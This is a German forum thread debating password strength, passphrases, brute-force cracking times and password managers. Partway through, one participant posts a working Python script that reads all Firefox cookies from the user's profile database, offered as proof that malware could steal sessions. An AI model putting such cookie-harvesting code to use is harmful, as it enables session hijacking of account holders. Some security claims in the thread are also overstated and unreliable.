Was ist das sicherste Passwort der Welt?
Brauche neue Passwörter, anscheinend ist PASSWORT1234! nicht sehr sinnvoll. Welches Passwort ist am sichersten und welche benutzt ihr so?
9 Antworten
Ein Merksatz von mir war = Ich bin 24 h fast immer geil und horny
= Ib24hfiguh ist ein mal für mich gemerktes Passwort (gewesen).
Nein das ist es nicht - du brauchst aber nicht nur neue Passwörter sondern auch dringend Ahnung von IT Sicherheit.
Gute Passwörter sollten nicht
- auf realen Worten (Namen, Begriffe, ...) basieren
- heutzutage mind. 12 Zeichen lang sein - eher länger
- Groß- und Kleinbuchstaben sowie Sonderzeichen und Ziffern enthalten
- nicht mit dir im Zusammenhang stehen (keine Geburtsdaten, etc.)
Du kannst sie zB aus einem Satz bilden - nehmen wir "Was ist das beste an Alzheimer? Man lernt jeden Tag neue Menschen kennen!" dann ergibt dieser Witz das Passwort:
WidBaA?MljTnMk!
Das sicherste Passwort nützt wir allerdings nichts wenn
- Schadware deine Passwörter stehlen oder abfangen kann
- du sie in einem Phishing-Angriff selber verrätst
- Schadware oder XSS Angriffe deine Cookies stehlen und man so ohne Passwort Zugriff auf deine Konten hat
- usw.
Sicherheit benötigt ein Gesamtkonzept und da ist das Passwort alleine viel zu wenig!
Stimmt - aber auch diese Länge reicht derzeit gut aus. Die von dir vorgeschlagene Länge ist zum eintippen eventuell schon sehr ungut.
Das sind 15 Stellen und selbst wenn man den Worst-Case nimmt und man hat einen MD5 Hash ohne Salt bei der Passwortspeicherung dann schafft eine RTX 3080 ca. 54033.1 MH/s. Damit kann man also rechnen:
>>> 104**15 / (54033.1 * 1000000) / 60 / 60 / 24 / 365
1056899269783.4493
Da kommst du selbst mit 4 oder 8 Grafikkarten nicht weit wenn eine Grafikkarte 1056899269783 Jahre brauchen würde. Selbst das von mir genannte Minimum von 12 Zeichen wäre mit 939580 Jahren mit einer RTX 3080 quasi nicht mit realistischem Aufwand zu knacken.
8 Zeichen, die vor einige Jahren noch als sicher galten, knackt die 3080 jetzt in unter 3 Tagen.
Außerdem habe ich bewusst ein Beispiel ohne Ziffern genommen damit es keiner 1:1 übernimmt.
Du musst halt wissen ob du zB ein paar Passwort-Gruppen nutzen willst oder kleiner Abwandlungen aber dafür nirgendwo Aufzeichnungen dazu existieren die man stehlen kann oder ob du alles in einem Passwortmanager speichern willst der dann aber sehr gut geschützt werden muss weil man sonst alle Passwörter verliert.
Mein Punkt war, dass man durch das Schreiben von ganzen Sätzen oder Phrasen ein Passwort hinbekommt, das
- leichter zu merken
- schneller zu schreiben
- UND weit länger und damit sicherer ist
als mit kryptischen Zeichenfolgen. Also gegen Brute-Force.
Ich kann nicht sagen ob das aktuell schon Thema ist, aber sollte Wörter erraten per KI eine Sache werden könnte es eventuell auch ein Risiko sein, einfach die üblichsten grammatikalisch korrekten 0815-Sätze zu bilden ("heutegeheichnachHause"). Deshalb würde ich da noch die erwähnten nonsense-Wörter, oder Dialekt-Wörter, oder zyklisch Zahlen einbauen, die nicht logisch zu erraten sind.
Ja das ist mir vollkommen klar - nur verstehst du meinen Punkt nicht...
Wenn ein User sich durchschnittlich 5x vertippt bis er das Passwort korrekt eingegeben hat, wird er es abspeichern weil es demjenigen zu doof wird! Dann kannst du gleich ein 24-, 32 oder 64-stelliges zufallsgeneriertes Passwort nehmen und das in einem PW-Manager speichern...
Sinn der Übung war es ja gerade den PW-Manager und das Speichern zu vermeiden!
Es mir merken zu können und es 5x am Tag abtippen zu wollen sind noch einmal zwei unterschiedliche Paar Schuhe.
Wo liegt das Problem mit dem Speichern bzw dem Passwortmanager, wenn nicht gerade dein Browser kompromittiert ist? Wenn einer Zugang zu deinem Gerät hat ist eh Ende im Gelände.
Für das Restrisiko per Remote gibt es 2FA.
Es mir merken zu können und es 5x am Tag abtippen zu wollen sind noch einmal zwei unterschiedliche Paar Schuhe.
Stimmt aber warum soll ich mir Passwörter ausdenken und merken wenn ich die eh abspeichere?!
Wo liegt das Problem mit dem Speichern bzw dem Passwortmanager, wenn nicht gerade dein Browser kompromittiert ist?
- Schadware die das Abgreift
- PW Manager an sich kompromittiert
- usw.
Wenn einer Zugang zu deinem Gerät hat ist eh Ende im Gelände.
Jein - wenn es die PW nur in meinem Hirn gibt dann nicht. Dann bekommt ein Angreifer nur die, die ich in dieser Zeit verwende. Und keine Komplette Liste aller Passwörter und aller Accounts.
Für das Restrisiko per Remote gibt es 2FA.
... was aber noch nicht jede Seite anbietet! Also bleiben genug kleinere Seiten auf denen dann auch was zu holen sein kann.
FazitWenn ich es ohnehin abspeichere brauche ich mir nichts ausdenken sondern dann kann ich gleich den Generator nehmen von dem PW-Manager!
Habe dann aber den einen Punkt auf den ich sehr gut aufpassen muss. Wenn damit was passiert ist alles geleakt.
Außerdem ist
5x am Tag abtippen
sehr wichtig! Denn du willst nicht auf Seiten eingeloggt bleiben. Das würde die Möglichkeit eröffnen deine Cookies zu stehlen und dann in die Session einzusteigen ohne Passwort. Außerdem ermöglicht das eventuell CSRF und andere Angriffe.
PS.: Gegen Keylogger kannst du dann Bildschirmtastaturen nutzen. Dann ist das Abfangen auch noch viel schwerer. Dann gibt es keine Aufzeichnungen und kein Eintippen.
Stimmt aber warum soll ich mir Passwörter ausdenken und merken wenn ich die eh abspeichere?!
Weil man mehrere Geräte benutzt? Ich experimentiere bspw. manchmal mit alternativer Android Firmware, und brauche dafür ein Google-Konto, das sind dann vielleicht 5x im Monat wo ich mich neu einlogge. Deshalb tippe ich das Passwort aber am PC nicht 10x am Tag ein wenn ich YouTube mit dem gleichen Konto aufrufe.
Generell, nutz mal 4 Geräte die teilweise nicht synchronisieren, dann lernt man die Passwörter TROTZ Merkfunktion ziemlich schnell.
Jein - wenn es die PW nur in meinem Hirn gibt dann nicht. Dann bekommt ein Angreifer nur die, die ich in dieser Zeit verwende. Und keine Komplette Liste aller Passwörter und aller Accounts.
Das ist für mich kein Faktor weil ich 9/10 meiner Online-Accounts eher freiwillig aufgebe als jemanden auf meine lokalen Dateien zugreifen zu lassen. Und nein, nichts illegales, nur ziemlich persönlich.
Weil man mehrere Geräte benutzt? Ich experimentiere bspw. manchmal mit alternativer Android Firmware, und brauche dafür ein Google-Konto, das sind dann vielleicht 5x im Monat wo ich mich neu einloggen.
Du sagst einerseits "Es mir merken zu können und es 5x am Tag abtippen zu wollen sind noch einmal zwei unterschiedliche Paar Schuhe" und dann wieder "Generell, nutz mal 4 Geräte die teilweise nicht synchronisieren, dann lernt man die Passwörter TROTZ Merkfunktion ziemlich schnell"...
Das macht alles keinen Sinn - dann speicherst du die langen und sicheren Passwörter also ab damit die Schadware einfach auslesen könnte, synchonisierst sie aber nicht damit du sie lernst?!
Du nutzt also Passwortspeicherung aber so, dass du den größten Vorteil davon nicht nutzt -
Deshalb tippe ich das Passwort aber am PC nicht 10x am Tag ein wenn ich YouTube mit dem gleichen Konto aufrufe.
Ich schon zumindest bei den Accounts wo es ein großes Missbrauchspotential gibt. Machst du das nicht, ist das schon mal unsicher... Wozu brauche ich dein Passwort wenn ich mir deine Session-Cookies schnappe und diese Verwende um mich bei einer Seite für dich auszugeben?
Zum betrachten der Video musst du nicht eingeloggt sein und du wirst keine 10x am Tag was an deinem Kanal machen wenn du einen hast!
Ich tippe auf den 6 Systemen die ich nutze sicherlich 50-100x am Tag ein Passwort ein und bin nur da eingeloggt wo ich mich sonst 30x oder öfter am Tag einloggen müsste wie FB oder GF.
Was glaubst du warum Banken oder Bezahldienste es nicht erlauben dauerhaft eingeloggt zu bleiben?
Das ist für mich kein Faktor weil ich 9/10 meiner Online-Accounts eher freiwillig aufgebe als jemanden auf meine lokalen Dateien zugreifen zu lassen.
Diese Aussage macht noch weniger Sinn - du lässt jedes Programm auf deinem Rechner auf deine pers. Daten zugreifen.
Hast du schon mal PDFs geöffnet? Ja? Na die können auch Javascript enthalten und so alles mögliche auf deinem System machen oder ausführen.
Das wären dann schon mal 2 Wege wie unbefugte auf deine Daten zugreifen können ohne dein Wissen...
Mach einfach was du glaubst - mir ist es mittlerweile um die Zeit zu schade da weiter zu diskutieren. Du reitest auf der Passwortlänge herum und hast an 10 anderen Stellen Angriffspotential für dutzende mögliche Angriffe.
Schön langsam glaube ich, dass du nur herumtrollst um Leuten die Zeit zu stehlen.
Ich finde die Idee dass jedes Programm und jedes Cookie anscheinend einfach so alles machen kann ziemlich ulkig - du glaubst nicht, dass Browser und Betriebssystem da vielleicht so etwas wie ein Rechte-Management haben?
Es kann einfach nicht jedes Programm auf alle beliebigen Daten zugreifen. Es hat schon einen Grund weshalb Passwörter meist eher über Social Engineering oder Server-Lecks beim Host abgegriffen werden als über Browser-Lücken beim Nutzer.
Ich will nicht trollen, ich finde nur die Paranoia ist hier höchst selektiv.
PS: Der Punkt mit den Passwörtern war nicht dass jeder ein 40-stelliges Passwort braucht, sondern dass selbst wenn man es nur buchstäblich ein einziges Mal eintippen muss (also beim Erstellen), 20 Stellen aus organischen Wörtern praktischer, schneller UND besser sind als 12 Stellen in Alien-Sprache. Weshalb ich die Passwort-Generatoren oder die "X Sonderzeichen Y Zahlen Z Großbuchstaben"-Tipps für etwas überflüssig halte.
Ich finde die Idee dass jedes Programm und jedes Cookie anscheinend einfach so alles machen kann ziemlich ulkig
Hier ein paar Zeilen Python-Code der dir beim Firefox unter Windows die Cookies ausließt:
import os
import sqlite3
f = os.path.join(os.getenv("APPDATA"), "Mozilla", "Firefox", "Profiles")
for name in os.listdir(f):
sqlite_file = os.path.join(f, name, "cookies.sqlite")
if os.path.isfile(sqlite_file):
break
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
c.execute("SELECT host, name, value FROM moz_cookies")
for row in c:
print(row)
Das Ergebnis:
('.paypal.com', 'cookie_check', 'yes')
('.paypal.com', 'tsrce', 'authchallengenodeweb')
('.paypal.com', 'enforce_policy', 'gdpr_v2.1')
('.paypal.com', 'LANG', 'de_DE%3BDE')
usw.
Das ist nicht "ulkig" sondern mein Job!
Die Daten per HTTP an meinen Server zu schicken wären dann noch 3 oder 4 extra Programmzeilen.
Für weitere Betriebssysteme und Browser müsste man einige weitere Programmzeilen einfügen aber die Tatsache, dass ich so einen Beispiel-Code in 3-4 Minuten zusammenbasteln konnte sollte dir schon zu denken geben!
du glaubst nicht, dass Browser und Betriebssystem da vielleicht so etwas wie ein Rechte-Management haben?
Klar - nur gehört die Datei in der meine Cookies stecken mir und wenn ich einen Browser mit meinem User-Rechten starte darf er diese Datei lesen genau so wie eine Schadware die ich mit meinen User-Rechten starte.
Die Cookies von anderen Usern auf deren Konten ich keinen Zugriff habe, sind durch das Rechte-Management dann geschützt.
Passwörter sind mittlerweile besser geschützt aber es gibt immer noch Wege da dran zu kommen.
Das sicherste Passwort nützt nichts, wenn die Anwendung es erlaubt, es ohne Zwangspause ständig zu wiederholen, das freut sich jedes Hackertool.
Zur heutigen Zeit sollte es, um relativ sicher zu sein, ab 18 Zeichen lang sein und keine Buchstaben-Aneinanderreihung aufweisen, welche als Wort in einem Wörterbuch vorkommen oder als Tastaturfolge oder ~muster auftreten.
Eingesetzte Sonderzeichen sollten keine optische Ähnlichkeiten mit den zu ersetzenden Buchstaben haben. Wichtig ist, das für verschiedene Anwendungen auch verschiedene Passwörter haben und das ein evtl. eingestzter Passwortmanager auf separater, besonders sicherer Umgebung läuft.
Was Passwörter angeht bin ich (fast) komplett auf Passwortmanager umgestiegen, was das Ausdenken von sicheren Passwörtern angeht funktioniert bei einer Handvoll Accounts noch gut. wenn man dann aber einige viele hat, und sich das ganze auch noch Merken möchte, werden Dopplungen oder Ähnlichkeiten auftreten. Bei mir ist es so gewesen, dass ich meine 10 Passwörter hatte und mir am ende aber nicht mehr merken konnte bei welchen Accounts ich welches Passwort mit welcher Variation hatte.
meine Passwort datenbank umfast 150+ Accounts - merken tue ich mir keines davon, die meisten davon sind zufällig generiert - ja ich habe auch noch ein Paar Passwörter die ich mir merke z.B. mich in den Schul-PC einzuloggen, aber sich für die Menge Accounts eigene Passwörter auszudenken nein danke.
Dank Auto type muss ich meine Passwörter auch nicht selber eingeben. wenn man sich in seinen Passwortmanager nach wahl (Bitwarden, Keepass etc) eingearbeitet hat erleichtert einem das schon ein wenig der den "Alltag"
Hilft natürlich nichts wenn man seine Passwort Datenbank nicht sicher verwahrt und und keine Backups anfertigt
wenn man sich aber passwörter selber ausdenken und Merken möchte ist die genannte Methode mit dem Satz ganz gut
ja moin dann ist am ende ist eben Egal was man macht - wenn man sein Gerät nicht sicher halten kann hat das ganze ohnehin keinen zweck, es gibt zig Methoden an Passwörter ranzukommen. sei es durch keylogger, lesen des zwischen Speichers, abgriff der Passwörter oder Cookies aus dem Browser.
Also ich würde dir empfehlen:
- Passwörter mit Bindestrichen (NICHT Unterstriche!)
- Zahlen verwenden
- Mindestens 14 Zeichen
- Passwörter nicht digital in Listen oder Passwortmanagern speichern sondern von Hand aufsschreiben
- Gross- Kleinschreibung beachten
Lg!
Ich würde anmerken, dass es wesentlich sicherer wäre wenn er "WasistdasBesteanAlzheimer?ManlerntjedenTagneueMenschenkennen" als Passwort nehmen würde, als die abgekürzte Variante.
Noch besser wäre natürlich ein Satz der kompletter nonsense ist. Oder Dialekt.